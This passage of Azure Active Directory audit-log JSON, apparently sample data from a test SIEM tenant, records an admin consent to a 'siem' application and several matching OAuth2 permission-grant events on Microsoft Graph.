8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem"}, {"Type": 2, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Type": 4, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585", "ModifiedProperties": [{"Name": "ConsentContext.IsAdminConsent", "OldValue": "", "NewValue": "True"}, {"Name": "ConsentContext.IsAppOnly", "OldValue": "", "NewValue": "False"}, {"NewValue": "True", "OldValue": "", "Name": "ConsentContext.OnBehalfOfAll"}, {"Name": "ConsentContext.Tags", "OldValue": "", "NewValue": ""}, {"Name": "ConsentAction.Permissions", "OldValue": "", "NewValue": "[] => [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; "}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", 
"Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ConsentContext.IsAdminConsent\",\"ConsentContext.IsAppOnly\",\"ConsentContext.OnBehalfOfAll\",\"ConsentContext.Tags\",\"ConsentAction.Permissions\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "654d7080-aee6-4826-abd9-c5710b336614"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:30:06.3393756Z"}, {"Name": "env_epoch", "Value": "38FW7"}, {"Name": "env_seqNum", "Value": "43118027"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR57"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": 
"Consent to application.", "Id": "0031778a-80cf-49f8-aea2-f798c9bf1ec9"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:30:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Microsoft Graph"}, {"Type": 2, "ID": "00000003-0000-0000-c000-000000000000"}, {"Type": 4, "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": ""}, 
{"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}, {"Name": "targetName", "Value": "Microsoft Graph"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "654d7080-aee6-4826-abd9-c5710b336614"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": 
"[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":null,\"ObjectClass\":\"ServicePrincipal\",\"AppId\":null,\"Name\":null}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:30:06.3343965Z"}, {"Name": "env_epoch", "Value": "38FW7"}, {"Name": "env_seqNum", "Value": "43118019"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR57"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add OAuth2PermissionGrant.", "Id": "ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:30:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": 
"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Microsoft Graph"}, {"Type": 2, "ID": "00000003-0000-0000-c000-000000000000"}, {"Type": 4, "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": ""}, {"NewValue": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", 
"Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}, {"Name": "targetName", "Value": "Microsoft Graph"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "654d7080-aee6-4826-abd9-c5710b336614"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":null,\"ObjectClass\":\"ServicePrincipal\",\"AppId\":null,\"Name\":null}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:30:06.3343965Z"}, {"Name": "env_epoch", "Value": "38FW7"}, {"Name": "env_seqNum", "Value": "43118019"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", 
"Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR57"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add OAuth2PermissionGrant.", "Id": "ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:30:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Microsoft Graph"}, {"Type": 2, "ID": "00000003-0000-0000-c000-000000000000"}, {"Type": 4, "ID": 
"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"NewValue": "", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": 
"98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}, {"Name": "targetName", "Value": "Microsoft Graph"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "654d7080-aee6-4826-abd9-c5710b336614"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":null,\"ObjectClass\":\"ServicePrincipal\",\"AppId\":null,\"Name\":null}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:30:06.3343965Z"}, {"Name": "env_epoch", "Value": "38FW7"}, {"Name": "env_seqNum", "Value": "43118019"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", 
"Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR57"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add OAuth2PermissionGrant.", "Id": "ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:30:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Microsoft Graph"}, {"Type": 2, "ID": "00000003-0000-0000-c000-000000000000"}, {"Type": 4, "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ModifiedProperties": [{"NewValue": 
"5c242833-909c-4c6b-bca3-50feaaa98d23", "OldValue": "", "Name": "ServicePrincipal.ObjectID"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": ""}, {"NewValue": "", "OldValue": "", "Name": "ServicePrincipal.AppId"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": ""}, {"NewValue": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}, {"Name": "targetName", "Value": "Microsoft Graph"}, {"Name": "targetIncludedUpdatedProperties", "Value": 
"[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "654d7080-aee6-4826-abd9-c5710b336614"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":null,\"ObjectClass\":\"ServicePrincipal\",\"AppId\":null,\"Name\":null}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:30:06.3343965Z"}, {"Name": "env_epoch", "Value": "38FW7"}, {"Name": "env_seqNum", "Value": "43118019"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR57"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add OAuth2PermissionGrant.", "Id": "ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:30:06", "Actor": [{"Type": 5, "ID": 
"asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, 